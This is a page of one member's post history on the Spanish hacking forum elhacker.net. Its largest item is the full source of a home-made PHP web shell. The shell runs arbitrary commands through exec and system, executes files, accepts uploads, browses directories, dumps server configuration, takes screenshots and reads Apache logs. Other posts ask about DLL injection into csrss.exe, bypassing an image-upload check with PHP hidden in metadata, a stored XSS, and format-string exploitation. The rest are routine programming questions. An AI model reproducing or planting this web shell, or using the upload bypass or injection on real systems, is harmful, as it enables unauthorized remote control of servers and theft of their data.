elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Temas
Páginas: 1 [2] 3
11  Seguridad Informática / Análisis y Diseño de Malware / Inyectar dll Pregunta... en: 26 Enero 2014, 12:27 pm
Hola que tal , estaba intentando inyectar una dll en el proceso csrss.exe. Me devuelve en el OpenProcess() acceso denegado. El codigo esta bien ya que lo pruebo para otros procesos y funciona a la perfeccion. Supongo que el csrss.exe tiene proteccion de windows , ¿alguno tiene idea sobre dicha proteccion?

Gracias.
12  Programación / PHP / Desarrollando shell. en: 28 Noviembre 2013, 04:19 am
Les dejo un intento de shell que estoy armando , esta muy basica por ahora.... Ire actualizando cuando tenga tiempo y la vaya arreglando.

Código:
<?php

echo "<form method='POST' action='shell.php'>Origen:<input type='text' name='copiar_origen' /><br/>
	  Destino:<input type='text' name='copiar_destino' /><br/>
	  <input type='submit' value='Copiar'/></form>";
/*Copiar!*/
if((@$_POST['copiar_destino'] && @$_POST['copiar_origen'])!="")
{
$destino=$_POST['copiar_destino'];
$origen=$_POST['copiar_origen'];
if(copy($origen,$destino))
{
	echo "Se copio.";
}
else
{
	echo "No se copio";
}
}

echo "<form method='POST' action='shell.php'>
	  <input type='text' name='directorio' id='directorio'/>
	  <input type='submit' value='Listar'/>
	  </form>
	  ";
/*Directorio*/
if(@$_POST['directorio']!="")
{
$directorio_actual=$_POST['directorio'];
echo $directorio_actual;

if(is_dir($directorio_actual))
{
	$directorio=opendir($directorio_actual);
	echo "<br/><h1>Archivos del directorio</h1><ul>";
	while(false!==($archivo=readdir($directorio)))
	{
		$rutaentera=$directorio_actual.DIRECTORY_SEPARATOR.$archivo;
		if(is_dir($rutaentera))
		{
			echo "<li onClick="."\"document.getElementById('directorio').value='".$directorio_actual.DIRECTORY_SEPARATOR.$archivo."'\">".$archivo.' Tipo:directorio</li>';
			
		}
		else
		{
		echo $archivo." Tamano:".filesize($rutaentera)." bytes. Tipo:".filetype($rutaentera)."<br />";
		}
	}
	echo "</ul>";
}
closedir($directorio_actual);
}

/*Comandos*/
echo "<form method='POST' action='shell.php'>
	  Comando:<input type='text' name='comando' /><input type='submit' value='Enviar'/><br/>
	  Exec<input type='radio' name='ph' value='exec'/><br/>
      System<input type='radio' name='ph' value='system'/><br/>
	  </form>";

if(@$_POST['comando']!="")
{
	$comando=$_POST['comando'];
	if(($_POST["ph"])=="exec")
	{
		echo exec($comando);
	}
	else if(($_POST["ph"])=="system")
	{
		system($comando,$resultado);
		echo "<pre>".$resultado."</pre>";
	}
}

/*Ejecutar archivos*/
echo "<form method='POST' action='shell.php'>
	  Archivo:<input type='text' name='archivo'/>
	  <input type='submit' value='Ejecutar'/>";

if(@$_POST['archivo']!="")
{
if(pclose(popen($_POST['archivo'],"r")))
{
	echo "Se ejecuto.";
}
else
{
	echo "No se ejecuto";
}
}

/*Informacion*/
echo "<br/>Informacion:".
	 "<br/><form method='POST' action='shell.php'>
	 PHP.INI<input type='radio' name='info' value='phpini'><br/>
	 ID PROCESO<input type='radio' name='info' value='proceso'><br/>
	 Nombre usuario<input type='radio' name='info' value='usuario'><br/>
	 Constantes Definidas<input type='radio' name='info' value='defcon'><br/>
	 PHPINFO<input type='radio' name='info' value='phpinfo'><br/>
	 Version Apache<input type='radio' name='info' value='apachever'><br/>
	 <input type='submit' value='Obtener!'/></form>";
if(@$_POST['info']=="phpini")
{
	echo "Direccion del phpini".php_ini_loaded_file();
	echo "<pre>";
	print_r(ini_get_all());
	echo "</pre>";
}
else if(@$_POST['info']=="proceso")
{
	echo "Id proceso php:".getmypid();
}
else if(@$_POST['info']=="usuario")
{
	echo "Usuario:".get_current_user();
}
else if(@$_POST['info']=="defcon")
{
echo "<pre>";
print_r(get_defined_constants());
echo "</pre>";	
}
else if(@$_POST['info']=="apachever")
{
	echo apache_get_version();
}
else if(@$_POST['info']=="phpinfo")
{
	echo phpinfo();
}

/*Subir archivo*/
echo "<form method='POST' action='shell.php' enctype='multipart/form-data'>
	  Archivo:<input type='file' name='subirarchivo'>
	  <input type='submit' name='subir' value='Subir!'/>
	  </form>";


if(isset($_POST['subir']))
{
	$nombre=$_FILES["subirarchivo"]['name'];
	$tamano=$_FILES["subirarchivo"]['size'];
	if(copy($_FILES['subirarchivo']['tmp_name'],$nombre))
	{
		echo "Se subio";
	}
	else
	{
		echo "fail";
	}
}
/*Safe mode*/
if(ini_get('safe_mode'))
{
	echo "Safe mode:On";
}
else
{
	echo "Safe mode:Off";
}
echo "<br/>IP:".$_SERVER['SERVER_ADDR'];

/*Espacio disco*/
echo "<form method='POST' action='shell.php'>
	  Espacio libre en el disco de:<input type='text' name='ruta' />
	  <input type='submit' name='bytes' value='Bytes'/>
	  </form>
	 ";
if(isset($_POST['bytes']))
{
 	$bytes=disk_free_space($_POST['ruta']);
 	$bits=$bytes*8;
 	$kb=$bytes/1024;
 	$mb=$kb/1024;
 	$gb=$mb/1024;
 	echo "<br/>Bits:".$bits."<br/>Bytes:".$bytes."<br/>Kbytes:".$kb."<br/>Mbytes:".$mb."<br/>Gbytes:".$gb;
}

echo "<form method='POST' action='shell.php'>
	  Espacio total del disco:<input type='text' name='ruta2'/>
	  <input type='submit' name='total' value='TOTAL'/>
	  </form>
     ";
if(isset($_POST['total']))
{
	$bytes=disk_total_space($_POST['ruta2']);
	$bits=$bytes*8;
	$kbytes=$bytes/1024;
	$mbytes=$kbytes/1024;
	$gbytes=$mbytes/1024;
	echo "<br/>Bits:".$bits."<br/>Bytes:".$bytes."<br/>Kbytes:".$kbytes."<br/>Mbytes:".$mbytes."<br/>GBytes:".$gbytes;
}
echo PHP_OS;

if(stristr(PHP_OS,'WIN'))
{
	echo "<form method='POST' action='shell.php'>
		  Direccion donde guardar foto:<input type='text' name='foto'/>
		  <input type='submit' name='sacar' value='Sacar foto'/>
		  <br/>PNG<input type='radio' name='tipoimagen' value='png'/>
		  <br/>JPG<input type='radio' name='tipoimagen' value='jpeg'/>
		  <br/>GIF<input type='radio' name='tipoimagen' value='gif'/>
		  <br/>Mostrar<input type='checkbox' name='mostrar'/>
		  </form>";

		  if(isset($_POST['sacar'])&& isset($_POST['tipoimagen']))
		  {
		  	$imagen=imagegrabscreen();
		  	$tipoimagen=$_POST['tipoimagen'];
		  	$direccion=(stristr($_POST['foto'],'.'.$tipoimagen))?$_POST['foto']:$_POST['foto'].'.'.$tipoimagen;
		  	$seteado=isset($_POST['mostrar']);
		  	if($tipoimagen=="png")
		  	{
		  	imagepng($imagen,$direccion);
		  	if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
		  	}else if($tipoimagen=="jpeg")
		  	{
		  		imagejpeg($imagen,$direccion);
		  		if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
		  	}
		  	else if($tipoimagen=="gif")
		  	{
		  		imagegif($imagen,$direccion);
		  		if($seteado)echo "<br/><img src=\"".$direccion."\"></br>";
		  	}
		  	imagedestroy($imagen);
		  }
}

if(stristr($_SERVER['SERVER_SOFTWARE'],"apache"))
{
	echo "<form method='post' action='shell.php'/>
		   Directorio apache:<input type='text' name='directorioo'/><br/>
		   <input type='submit' name='guachen' value='Mostrar'/>
		   </form>";
    if((isset($_POST['guachen']) && $_POST['directorioo']!=""))
    {
    	$directorio=($_POST['directorioo']).DIRECTORY_SEPARATOR."logs".DIRECTORY_SEPARATOR;
    	function mostrar($esa)
    	{
    		$directorio=($_POST['directorioo']).DIRECTORY_SEPARATOR."logs".DIRECTORY_SEPARATOR;
    		$handle=fopen($directorio.$esa,"r");
    		while(!feof($handle))
    			echo "<br/>".fgets($handle);
    		fclose($handle);
    	}
    	echo "Access log:";
    	if(file_exists($directorio."access.log"))
    	{
    	mostrar("access.log");
        }else{
     "No existe<br/>";
 		}
    		
    	echo "Error log:";
    	if(file_exists($directorio."error.log"))
    	{
    	mostrar("error.log");
    	}
    	else
    	{
    		echo "No existe.<br/>";
    	}
    	if(file_exists($directorio."install.log"))
    	{
    		mostrar("install.log");
    	}
    	else
    	{
    		echo "No existe.<br/>";
    	}

    }
}


?>
13  Seguridad Informática / Nivel Web / Bypass getimagesize() Pregunta. en: 27 Noviembre 2013, 02:43 am
Buenas! Espero que anden bien . Ando tratando de bypassear un upload de imagenes que utilize esto como medida de seguridad. Leyendo por LAAAAAAAAAA INTERNET , encontre que la bypassean agregando en algun metadato de la imagen codigo php y luego renombran el archivo a .php. Sin embargo esto no me funciona y nose xq. El codigo php que ingrese en el metadato se inserto en los datos de la imagen pero no tengo idea porque no se ejecuta el php.

Mi imagen

http://paste.debian.net/?show=105175;lines=0

Como veran se inserto... nose porque no me funciona. Lo ejecuto como bypass.php
14  Seguridad Informática / Nivel Web / Pregunta , esto es un xss? en: 25 Noviembre 2013, 17:12 pm
Miren estaba creando una publicacion y se me ocurrio meterle javascript , cuando le meto codigo JS ,me lo cambio al famoso less than gt , todo venia normal , pero luego edite codigo y le cambie el less than y gt por el <, > , creo la publicacion y cuando entro al blog , entro a esa publicacion, me aparece el famoso alert :P . Es un bug? o esta bien que el dueño del blog pueda meter JS perjudicial para el usuario?
15  Programación / PHP / Funciones PHP en: 18 Noviembre 2013, 18:20 pm
¿Como hago para ver como estan hechas las funciones en php? (Ver el codigo en c de cada una)

Gracias.
16  Seguridad Informática / Bugs y Exploits / Ayuda format string en: 31 Julio 2013, 13:16 pm
Tengo el siguiente codigo:
Código:
#include <stdio.h>

int main()
{
char hola[]="AAAA";
printf(hola);
}


Bueno , segun entendi , si no lo especificamos de la manera printf("%s",hola) , podriamos pedir direcciones de memoria q estan en la pila hasta llegar a la de nuestra variable , de esta forma
Código:
#include <stdio.h>

int main()
{
char hola[]="AAAA %p %p %p %p %p";
printf(hola);
}

Esto nos va a dar 5 direcciones de memoria  , si no encontramos 0x41414141(AAAA) seguimos poniendo mas %p , hasta encontrarlas.
Hasta ahi todo bien. Encuentro 0x41414141 .Despues de ahi nose q mas hacer.
Duda :
No entiendo , cambio el valor de una direccion en memoria o estoy metiendo la direccion de memoria(Supongo q es la ultima).
17  Programación / Programación C/C++ / Duda direcciones de memoria C en: 18 Julio 2013, 15:46 pm
Hola que tal , como les va , espero que bien. Bueno voy a la pregunta .
Tengo el siguiente codigo :
Código:
#include <stdio.h>

main()
{
	int i,array1[5]={0,1,2,3,4};
	int* ptrArray1;
	ptrArray1=array1;
    for(i=0;i<5;i++)
    	printf("\nDesplazamiento del puntero por el array %d.Direccion: %p",*(ptrArray1+i),(ptrArray1+i));

}


El resultado es :

Desplazamiento del puntero por el array 0.Direccion: 0028FEF4
Desplazamiento del puntero por el array 1.Direccion: 0028FEF8
Desplazamiento del puntero por el array 2.Direccion: 0028FEFC
Desplazamiento del puntero por el array 3.Direccion: 0028FF00
Desplazamiento del puntero por el array 4.Direccion: 0028FF04

Perfecto el codigo funca bien todo , ahora , la pregunta. ¿Porque cada vez que corro este programa la direccion en memoria del primer elemento del array es la misma? (Al ser siempre la primera la misma , las otras son iguales xq son consecutivas a esta ).

Gracias.
18  Programación / .NET (C#, VB.NET, ASP) / Problema Sockets C# en: 20 Mayo 2013, 06:15 am
Código:
int iFil = 0, iCol = 0;
                socket.Receive(bytes);
                iFil = System.Convert.ToInt32(System.Text.Encoding.ASCII.GetString(bytes));
                socket.Receive(bytes);
                iCol = System.Convert.ToInt32(System.Text.Encoding.ASCII.GetString(bytes));

Problema:Me tira error de parseo.
19  Programación / ASM / Libro de ASM para linux. en: 11 Enero 2013, 04:04 am
Hola que tal , estoy buscando algun libro de asm 32 bits para linux, ensamblador NASM.

Saludos.
20  Sistemas Operativos / GNU/Linux / System calls kernel 3.2.34 en: 6 Enero 2013, 08:24 am
Hola que tal , estaba buscando todos los system calls para el kernel 3.2.34 .
Encontre para el kernel 2.2 , http://docs.cs.up.ac.za/programming/asm/derick_tut/syscalls.html, fijense en el link para darse una idea de lo que estoy buscando.

Gracias y disculpen mi ignorancia.
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines